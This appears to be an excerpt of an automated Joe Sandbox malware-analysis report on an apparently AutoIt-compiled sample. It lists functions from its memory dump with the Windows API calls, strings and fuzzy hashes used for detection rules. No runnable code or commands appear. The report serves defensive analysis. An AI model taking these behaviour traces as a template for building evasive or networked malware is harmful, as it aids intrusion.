Opcode Fuzzy Hash: ae5b2787d2f4e820a9b6d29556b22c885541f7b2152b883657c2fa0b479923f0
Instruction Fuzzy Hash: ED31AD31604256AFDB218F65CC44BBBBBEAFF41360F154169F864871A1EF32E890DB90

Function 000BCB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000329E2: GetWindowLongW.USER32(?,000000EB), ref: 000329F3

GetCursorPos.USER32(?), ref: 000BCB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0006BCEC,?,?,?,?,?), ref: 000BCB8F
GetCursorPos.USER32(?), ref: 000BCBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0006BCEC,?,?,?), ref: 000BCC16

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 9726429233d36599b00d8ead102ef499966035a6ee6286cf8fe8ce71a642b19e
Instruction ID: d24b578bbb0320aafe57c8df60b8633380b90ffacaa04bfd1521d612fabc217c
Opcode Fuzzy Hash: 9726429233d36599b00d8ead102ef499966035a6ee6286cf8fe8ce71a642b19e
Instruction Fuzzy Hash: 08318B35600118AFEB258F59CC99EFE7BF9EB49310F044099F9099B262C735AD51EFA0

Function 000B634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 000B63BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 000B63D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 000B63E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000B63F3

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 91b3ce7f3dc1aa66bc046e527fb1797104551dda21e56ec260eee7fad46baf38
Instruction ID: 39fd94bfc6287e1e9258003d2218c3a8803558ef0ffe091836fa01037d29af36
Opcode Fuzzy Hash: 91b3ce7f3dc1aa66bc046e527fb1797104551dda21e56ec260eee7fad46baf38
Instruction Fuzzy Hash: 5211DF31300414AFE705AB24CC54FFE7798EF45720F144118F916CB2E2CBAAAD00CB90

Function 0008E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0008F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0008E46F,?,?,?,0008F262,00000000,000000EF,00000119,?,?), ref: 0008F867
Part of subcall function 0008F858: lstrcpyW.KERNEL32(00000000,?), ref: 0008F88D
Part of subcall function 0008F858: lstrcmpiW.KERNEL32(00000000,?,0008E46F,?,?,?,0008F262,00000000,000000EF,00000119,?,?), ref: 0008F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0008F262,00000000,000000EF,00000119,?,?,00000000), ref: 0008E488
lstrcpyW.KERNEL32(00000000,?), ref: 0008E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,0008F262,00000000,000000EF,00000119,?,?,00000000), ref: 0008E4E2

Strings

cdecl, xrefs: 0008E4D9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 6ae8e0cb2c6f1b672f0b02bcc446ca2c9fe81a560cad15b797e20a2dc75c6aa9
Instruction ID: 33af602a050889b8d694703934a5ce6256c0106d459e51beb9e8396bd06ab348
Opcode Fuzzy Hash: 6ae8e0cb2c6f1b672f0b02bcc446ca2c9fe81a560cad15b797e20a2dc75c6aa9
Instruction Fuzzy Hash: 4511E23A200385EFDB25AF34DC45DBE77A9FF45350B40402AF84ACB2A0EB719940C791

Function 00094365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00094385
_memset.LIBCMT ref: 000943A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 000943F8
CloseHandle.KERNEL32(00000000), ref: 00094401

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 680ded519c7e64973cc9cab60495cecc101276dd61ce91cd6ca1610bf920b6d2
Instruction ID: c017c5f73c356cd759ad055ad7f54ebd2cba847944d9f43f4d07ae961dd11d95
Opcode Fuzzy Hash: 680ded519c7e64973cc9cab60495cecc101276dd61ce91cd6ca1610bf920b6d2
Instruction Fuzzy Hash: 5911AB75901228BAE7309BA5AC4DFEBBB7CEF45760F10459AF908D7190D6744F80CBA4

Function 000A6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0004402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00097E51,?,?,00000000), ref: 00044041
Part of subcall function 0004402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00097E51,?,?,00000000,?,?), ref: 00044065

gethostbyname.WSOCK32(?,?,?), ref: 000A6A84
WSAGetLastError.WSOCK32(00000000), ref: 000A6A8F
_memmove.LIBCMT ref: 000A6ABC
inet_ntoa.WSOCK32(?), ref: 000A6AC7

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 0c5341218efcaa67e93547422f57e1a4d7ed19505d25d41a78f3ce1eeb520872
Instruction ID: 8bd1e8af7a3b89ea4862275a4f569f87b9b5b72aec477142bb37a7b6ad6001c9
Opcode Fuzzy Hash: 0c5341218efcaa67e93547422f57e1a4d7ed19505d25d41a78f3ce1eeb520872
Instruction Fuzzy Hash: 54115E76900108EFCB04EFA4CD86DEEB7B8EF15310B148165F506A72A2DF31AE14DBA1

Function 00032111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0003214F
GetStockObject.GDI32(00000011), ref: 00032163
SendMessageW.USER32(00000000,00000030,00000000), ref: 0003216D

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 5a5baace4d5e78169d2030432184116ca235ef3e90fd5aee079878b7d4ae1a0f
Instruction ID: 9b46e1b9add8043d4066153689cdbac4691c2210ac4b64985c24e5c53c8b1bc6
Opcode Fuzzy Hash: 5a5baace4d5e78169d2030432184116ca235ef3e90fd5aee079878b7d4ae1a0f
Instruction Fuzzy Hash: C2118B72501209BFEB124F949D44EEABBADEF68394F040201FB1452110C7359C60EBA0

Function 000BE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000BE1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 000BE201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 000BE216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 000BE234

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 386eb6db91301c0a1bb75e25294a220134940a0e89f125be396eda6654114d33
Instruction ID: 5aec5350c6f50d373924a81cb24fdee31efcce4cbd6e020b7c35fa924a255314
Opcode Fuzzy Hash: 386eb6db91301c0a1bb75e25294a220134940a0e89f125be396eda6654114d33
Instruction Fuzzy Hash: 44116DB5206348DFE3348F51ED09FD7BBBCEB00B04F108A59A61AD6150D7B5E908EBA1

Function 000BC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 000316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00031729
Part of subcall function 000316CF: SelectObject.GDI32(?,00000000), ref: 00031738
Part of subcall function 000316CF: BeginPath.GDI32(?), ref: 0003174F
Part of subcall function 000316CF: SelectObject.GDI32(?,00000000), ref: 00031778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000BC3E8
LineTo.GDI32(00000000,?,?), ref: 000BC3F5
EndPath.GDI32(00000000), ref: 000BC405
StrokePath.GDI32(00000000), ref: 000BC413

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 504e60cc8925a679f85e60d1c3947ab1eaec88b961f668979d050cce09fd8e73
Instruction ID: 5975c04264c53f809e228e03e79843189940bdc9c45dd1c26fe143610c6d1948
Opcode Fuzzy Hash: 504e60cc8925a679f85e60d1c3947ab1eaec88b961f668979d050cce09fd8e73
Instruction Fuzzy Hash: 76F0BE31045219FAFB132F90AC0EFDE3F99AF05311F188000FA51210E287781A91DBAA

Function 0008AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0008AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 0008AA82
GetCurrentThreadId.KERNEL32 ref: 0008AA89
AttachThreadInput.USER32(00000000), ref: 0008AA90

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 643ca9cb92fd7deda930fbd98091a1d41450a72779d4f5ecbcddb56b274009f6
Instruction ID: 40f14529fdcfe2ed7ad9c2d5db4696b963839a38538f71a7703d862b3a74c823
Opcode Fuzzy Hash: 643ca9cb92fd7deda930fbd98091a1d41450a72779d4f5ecbcddb56b274009f6
Instruction Fuzzy Hash: 7CE06D31641228BAFB216FA2DD0CEEB7F5CFF127A1F048012F94984890C7768550CBE1

Function 000325F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0003260D
SetTextColor.GDI32(?,000000FF), ref: 00032617
SetBkMode.GDI32(?,00000001), ref: 0003262C
GetStockObject.GDI32(00000005), ref: 00032634
GetWindowDC.USER32(?,00000000), ref: 0006C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 0006C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 0006C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 0006C203
GetPixel.GDI32(00000000,?,?), ref: 0006C223
ReleaseDC.USER32(?,00000000), ref: 0006C22E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: a6e6906ef66acb56092fae5ca49937f18c433a327a48c90107a7baef3294e854
Instruction ID: 468aeb7d3753fabb6ccc4645bbd01950abcd1f418c060a120e1f8e0c6e8022f2
Opcode Fuzzy Hash: a6e6906ef66acb56092fae5ca49937f18c433a327a48c90107a7baef3294e854
Instruction Fuzzy Hash: 59E06D31504244FBFB625FA8AC4DFE87B51EB05332F088366FEA9880E187754980DB11

Function 00070679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00070679
GetDC.USER32(00000000), ref: 00070683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 000706A3
ReleaseDC.USER32(?), ref: 000706C4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e223e98ca8124cb520085c996c15fa7ea42af46d405b6d3a0cb766f954944eed
Instruction ID: 9fa9d4a4f4e9c387d1b1b55a7c058fcb0e24d31ca6891bdacfe7c099dc77f41c
Opcode Fuzzy Hash: e223e98ca8124cb520085c996c15fa7ea42af46d405b6d3a0cb766f954944eed
Instruction Fuzzy Hash: 2AE012B1800204EFEF129FA0D808BADBBF5EB8C310F218009F85AA7210CB3C9551DF50

Function 0007068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0007068D
GetDC.USER32(00000000), ref: 00070697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 000706A3
ReleaseDC.USER32(?), ref: 000706C4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c80508a4ff5660dcf21b6cb697f4c77060be113b3d53e99300bbe6603b8b317e
Instruction ID: 23ba5ec1fa1a13d853a8d1b0968069282a10226df0a462fa51d19aed4d9af779
Opcode Fuzzy Hash: c80508a4ff5660dcf21b6cb697f4c77060be113b3d53e99300bbe6603b8b317e
Instruction Fuzzy Hash: 4EE012B1800204EFEF129FA0D808B9DBBF5AB8C310F118008F95AA7210CB3C9551CF50

Function 0003E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0003E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 0003E037

Strings

@, xrefs: 0003E02B

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: bebc15e2baae478cd9f06e71c6180a8cf6a9f56960f8aae9d85b6cdce6b74412
Instruction ID: 36e3a9919cc86dbc0903e89de9012fb89978035ff8443de91533f151c05dc452
Opcode Fuzzy Hash: bebc15e2baae478cd9f06e71c6180a8cf6a9f56960f8aae9d85b6cdce6b74412
Instruction Fuzzy Hash: BE515971408B449BE321AF50EC85BAFB7FCFB85314F41484EF5D945192DB70A929CB26

Function 000B8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 000B8186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000B819B

Strings

', xrefs: 000B80EF

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 12f9d63ef608b0dd01e1b1c1c67fcf14db1abd7a6709fe581a90674915ffc0f9
Instruction ID: 43e01637d4f63db39b1bc479c21ea872c9d179c109bda0c6984124583e058a5e
Opcode Fuzzy Hash: 12f9d63ef608b0dd01e1b1c1c67fcf14db1abd7a6709fe581a90674915ffc0f9
Instruction Fuzzy Hash: 11410874A052099FDB54DF68C881BEA7BF9FB08340F10456AE908AB352DB71A956CF90

Function 000A40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 000A4132

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

Strings

, $, xrefs: 000A4172
AUTOITCALLVARIABLE%d, xrefs: 000A4124

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 48d2f16cccb8ca2c292c577c1ff35b99d83df6811b7b5a3f40446d8f6d3d9e59
Instruction ID: 86d52551212e291cc50dd400a62a9ff77c68e8059a375653e95f6257c4943cd0
Opcode Fuzzy Hash: 48d2f16cccb8ca2c292c577c1ff35b99d83df6811b7b5a3f40446d8f6d3d9e59
Instruction Fuzzy Hash: 18218174A0021DAFCF10EFA4CC91EEE7BB5EF59340F444464F905AB242DB70A985CBA5

Function 000A28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000A28F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000A2921

Strings

<local>, xrefs: 000A28E9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 474e8b9c2a75793931e1dcf5cbd822998772abaf1b0db8cc46ef57dbb5de8b99
Instruction ID: 77df817e0e9adf20fb5b4715338a9154c4b7f6b7c05735701b331c7ef8251495
Opcode Fuzzy Hash: 474e8b9c2a75793931e1dcf5cbd822998772abaf1b0db8cc46ef57dbb5de8b99
Instruction Fuzzy Hash: 9C11A070502225FAEB298F958C89EFBFBACFF06751F10823AF94556140EB746894D6F0

Function 000A8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000A86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,000A849D,?,00000000,?,?), ref: 000A86F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 000A84A0
htons.WSOCK32(00000000,?,00000000), ref: 000A84DD

Strings

255.255.255.255, xrefs: 000A84B8

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 0e2e0f31b05c235317287796d2ed59082a45fc94234355fea5719b09583df135
Instruction ID: e3d4a5581b06cdf1d448f6e880e907de0004b5574327ff7ac89db8ecb28fe392
Opcode Fuzzy Hash: 0e2e0f31b05c235317287796d2ed59082a45fc94234355fea5719b09583df135
Instruction Fuzzy Hash: 45112B74604206ABDB24EFA4CC46FFEB364FF05310F108626F915572C2DB71A810C795

Function 00088892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

